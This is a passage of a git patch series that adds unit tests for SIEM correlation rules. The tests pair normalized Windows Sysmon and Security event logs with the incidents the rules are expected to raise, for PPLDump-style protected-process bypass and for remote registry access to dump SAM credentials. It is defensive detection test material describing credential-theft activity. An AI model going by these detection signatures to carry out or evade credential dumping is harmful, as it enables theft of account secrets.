"A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "6644", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "?", "object.process.parent.guid": "00000000-0000-0000-0000-000000000000", "object.process.parent.id": "624", "object.process.parent.name": "?", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:05:54.727Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:35.263Z", "type": "raw", "uuid": "990452ea-e6c1-474f-9548-a07ae741a722"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:35.2846041Z\"},\"EventRecordID\":\"564606\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:35.276\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-6e19-6082-0000-0010f6600000}\"},{\"Name\":\"SourceProcessId\",\"text\":\"624\"},{\"Name\":\"SourceThreadId\",\"text\":\"2368\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-f41f-6081-0000-001078834a00}\"},{\"Name\":\"TargetProcessId\",\"text\":\"6644\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+485d2|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+45163|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1cd9f|C:\\\\Windows\\\\system32\\\\services.exe+9f39|C:\\\\Windows\\\\system32\\\\services.exe+c665|C:\\\\Windows\\\\system32\\\\services.exe+90d5|C:\\\\Windows\\\\system32\\\\services.exe+8d4c|C:\\\\Windows\\\\system32\\\\services.exe+de2d|C:\\\\Windows\\\\system32\\\\services.exe+15a8e|C:\\\\Windows\\\\system32\\\\services.exe+15d78|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+77803|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+1436c|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+1756a|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+54a18|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+30490|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+2fe3b|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+221ff|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+2165a|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+20c21|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+20692|C:\\\\Windows\\\\System32\\\\RPCRT4.dll+17465|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4f4d0|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+50358\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2368", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+485d2|C:\\Windows\\System32\\KERNELBASE.dll+45163|C:\\Windows\\System32\\KERNEL32.DLL+1cd9f|C:\\Windows\\system32\\services.exe+9f39|C:\\Windows\\system32\\services.exe+c665|C:\\Windows\\system32\\services.exe+90d5|C:\\Windows\\system32\\services.exe+8d4c|C:\\Windows\\system32\\services.exe+de2d|C:\\Windows\\system32\\services.exe+15a8e|C:\\Windows\\system32\\services.exe+15d78|C:\\Windows\\System32\\RPCRT4.dll+77803|C:\\Windows\\System32\\RPCRT4.dll+1436c|C:\\Windows\\System32\\RPCRT4.dll+1756a|C:\\Windows\\System32\\RPCRT4.dll+54a18|C:\\Windows\\System32\\RPCRT4.dll+30490|C:\\Windows\\System32\\RPCRT4.dll+2fe3b|C:\\Windows\\System32\\RPCRT4.dll+221ff|C:\\Windows\\System32\\RPCRT4.dll+2165a|C:\\Windows\\System32\\RPCRT4.dll+20c21|C:\\Windows\\System32\\RPCRT4.dll+20692|C:\\Windows\\System32\\RPCRT4.dll+17465|C:\\Windows\\SYSTEM32\\ntdll.dll+4f4d0|C:\\Windows\\SYSTEM32\\ntdll.dll+50358", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-f41f-6081-0000-001078834a00", "object.process.id": "6644", "object.process.name": "svchost.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T19:05:54.727Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\services.exe", "subject.process.guid": "747f3d96-6e19-6082-0000-0010f6600000", "subject.process.id": "624", "subject.process.name": "services.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:35.276Z", "type": "raw", "uuid": "71be7ec4-775e-4545-8608-32b6e6aa7510"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "PPL_Bypass_via_PPLDump_Tool", "correlation_type": "incident", "datafield5": "2368", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+485d2|C:\\Windows\\System32\\KERNELBASE.dll+45163|C:\\Windows\\System32\\KERNEL32.DLL+1cd9f|C:\\Windows\\system32\\services.exe+9f39|C:\\Windows\\system32\\services.exe+c665|C:\\Windows\\system32\\services.exe+90d5|C:\\Windows\\system32\\services.exe+8d4c|C:\\Windows\\system32\\services.exe+de2d|C:\\Windows\\system32\\services.exe+15a8e|C:\\Windows\\system32\\services.exe+15d78|C:\\Windows\\System32\\RPCRT4.dll+77803|C:\\Windows\\System32\\RPCRT4.dll+1436c|C:\\Windows\\System32\\RPCRT4.dll+1756a|C:\\Windows\\System32\\RPCRT4.dll+54a18|C:\\Windows\\System32\\RPCRT4.dll+30490|C:\\Windows\\System32\\RPCRT4.dll+2fe3b|C:\\Windows\\System32\\RPCRT4.dll+221ff|C:\\Windows\\System32\\RPCRT4.dll+2165a|C:\\Windows\\System32\\RPCRT4.dll+20c21|C:\\Windows\\System32\\RPCRT4.dll+20692|C:\\Windows\\System32\\RPCRT4.dll+17465|C:\\Windows\\SYSTEM32\\ntdll.dll+4f4d0|C:\\Windows\\SYSTEM32\\ntdll.dll+50358", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "PPL_Bypass_via_PPLDump_Tool|msedgewin10|C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-f41f-6081-0000-001078834a00", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "6644", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "?", "object.process.parent.fullpath": "?", "object.process.parent.guid": "00000000-0000-0000-0000-000000000000", "object.process.parent.id": "624", "object.process.parent.name": "?", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "subject.process.fullpath": "c:\\windows\\system32\\services.exe", "subject.process.guid": "747f3d96-6e19-6082-0000-0010f6600000", "subject.process.id": "624", "subject.process.name": "services.exe"} From 1b2195843b9538f80e5e3eb8123451cce357a21b Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 19:56:29 +0300 Subject: [PATCH 15/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Remote?= =?UTF-8?q?=5Fregistry=5Faccess)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Remote_registry_access/tests/test_1.sc | 6 ++++++ .../Remote_registry_access/tests/test_2.sc | 6 ++++++ 2 files changed, 12 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_1.sc new file mode 100644 index 00000000..ec0dd2a7 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_1.sc @@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-13T08:03:45.1093750Z\"},\"EventRecordID\":\"11412798\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"512\",\"ThreadID\":\"520\"},\"Channel\":\"Security\",\"Computer\":\"dc01.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-1603\"},{\"Name\":\"SubjectUserName\",\"text\":\"adm_back\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x97f06\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"192.168.224.50\"},{\"Name\":\"IpPort\",\"text\":\"54783\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"winreg\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "dc01.stand2008.local", "dst.host": "dc01.stand2008.local", "dst.hostname": "dc01", "event_src.category": "Operating system", "event_src.fqdn": "dc01.stand2008.local", "event_src.host": "dc01.stand2008.local", "event_src.hostname": "dc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T08:41:54.820Z", "src.host": "192.168.224.50", "src.ip": "192.168.224.50", "src.port": 54783, "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "subject.account.name": "adm_back", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "622342", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-13T08:03:45.109Z", "type": "raw", "uuid": "ea3ca7e4-5f8a-4b2a-96bb-7298b4065e63"} +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4672\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12548\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-13T08:03:45.0937500Z\"},\"EventRecordID\":\"11412795\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"512\",\"ThreadID\":\"1208\"},\"Channel\":\"Security\",\"Computer\":\"dc01.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-1603\"},{\"Name\":\"SubjectUserName\",\"text\":\"adm_back\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x97f06\"},{\"Name\":\"PrivilegeList\",\"text\":\"SeBackupPrivilege SeRestorePrivilege\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "dst.fqdn": "dc01.stand2008.local", "dst.host": "dc01.stand2008.local", "dst.hostname": "dc01", "event_src.category": "AAA", "event_src.fqdn": "dc01.stand2008.local", "event_src.host": "dc01.stand2008.local", "event_src.hostname": "dc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4672_Special_privileges_assigned_to_new_logon", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4672", "normalized": true, "object": "account", "object.account.domain": "stand2008", "object.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "object.account.name": "adm_back", "object.account.privileges": "SeBackupPrivilege SeRestorePrivilege", "object.account.session_id": "622342", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T08:41:54.823Z", "src.fqdn": "dc01.stand2008.local", "src.host": "dc01.stand2008.local", "src.hostname": "dc01", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "subject.account.name": "adm_back", "subject.account.session_id": "622342", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-13T08:03:45.093Z", "type": "raw", "uuid": "0915db36-a28f-4471-93cc-9c41a6f778de"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-13T08:03:45.0937500Z\"},\"EventRecordID\":\"11412796\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"512\",\"ThreadID\":\"1208\"},\"Channel\":\"Security\",\"Computer\":\"dc01.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"SubjectUserName\",\"text\":\"-\"},{\"Name\":\"SubjectDomainName\",\"text\":\"-\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x0\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-1603\"},{\"Name\":\"TargetUserName\",\"text\":\"adm_back\"},{\"Name\":\"TargetDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x97f06\"},{\"Name\":\"LogonType\",\"text\":\"3\"},{\"Name\":\"LogonProcessName\",\"text\":\"Kerberos\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"Kerberos\"},{\"Name\":\"WorkstationName\"},{\"Name\":\"LogonGuid\",\"text\":\"{2a0e1034-b8ef-65ad-afa3-48bb81157893}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x0\"},{\"Name\":\"ProcessName\",\"text\":\"-\"},{\"Name\":\"IpAddress\",\"text\":\"192.168.224.50\"},{\"Name\":\"IpPort\",\"text\":\"54783\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield6": "Network", "datafield9": "Kerberos", "dst.fqdn": "dc01.stand2008.local", "dst.host": "dc01.stand2008.local", "dst.hostname": "dc01", "event_src.category": "AAA", "event_src.fqdn": "dc01.stand2008.local", "event_src.host": "dc01.stand2008.local", "event_src.hostname": "dc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "Kerberos", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T08:41:54.823Z", "src.host": "192.168.224.50", "src.ip": "192.168.224.50", "src.port": 54783, "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "subject.account.name": "adm_back", "subject.account.session_id": "622342", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-13T08:03:45.093Z", "type": "raw", "uuid": "b57dbb0c-2a91-4e3b-872e-2ed8587756ad"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: Security Account Manager", "correlation_name": "Remote_registry_access", "correlation_type": "incident", "datafield6": "0x12019f", "datafield9": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "dst.fqdn": "dc01.stand2008.local", "dst.host": "dc01.stand2008.local", "dst.hostname": "dc01", "event_src.category": "Operating system", "event_src.fqdn": "dc01.stand2008.local", "event_src.host": "dc01.stand2008.local", "event_src.hostname": "dc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Remote_registry_access|622342", "incident.aggregation.timeout": 3600, "incident.category": "Undefined", "incident.severity": "medium", "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "src.host": "192.168.224.50", "src.ip": "192.168.224.50", "src.port": 54783, "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "subject.account.name": "adm_back", "subject.account.privileges": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "subject.account.session_id": "622342", "subject.privileges": "SeBackupPrivilege SeRestorePrivilege"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_2.sc new file mode 100644 index 00000000..dea6c0de --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_2.sc @@ -0,0 +1,6 @@ +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4672\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12548\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2022-02-16T10:37:20.4504122Z\"},\"EventRecordID\":\"2988528\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"624\",\"ThreadID\":\"2908\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220106\"},{\"Name\":\"SubjectUserName\",\"text\":\"samir\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x567515\"},{\"Name\":\"PrivilegeList\",\"text\":\"SeBackupPrivilege SeRestorePrivilege\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "dst.fqdn": "01566s-win16-ir.threebeesco.com", "dst.host": "01566s-win16-ir.threebeesco.com", "dst.hostname": "01566s-win16-ir", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4672_Special_privileges_assigned_to_new_logon", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4672", "normalized": true, "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "object.account.name": "samir", "object.account.privileges": "SeBackupPrivilege SeRestorePrivilege", "object.account.session_id": "5666069", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T12:35:27.481Z", "src.fqdn": "01566s-win16-ir.threebeesco.com", "src.host": "01566s-win16-ir.threebeesco.com", "src.hostname": "01566s-win16-ir", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "subject.account.name": "samir", "subject.account.session_id": "5666069", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2022-02-16T10:37:20.450Z", "type": "raw", "uuid": "8c93aa37-468e-4b7a-a0ef-d90a87c07405"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2022-02-16T10:37:20.4515786Z\"},\"EventRecordID\":\"2988531\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"7720\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220106\"},{\"Name\":\"SubjectUserName\",\"text\":\"samir\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x567515\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.25\"},{\"Name\":\"IpPort\",\"text\":\"50251\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"winreg\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "01566s-win16-ir.threebeesco.com", "dst.host": "01566s-win16-ir.threebeesco.com", "dst.hostname": "01566s-win16-ir", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T12:35:27.482Z", "src.host": "172.16.66.25", "src.ip": "172.16.66.25", "src.port": 50251, "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "subject.account.name": "samir", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "5666069", "tag": "some_tag", "task_id": 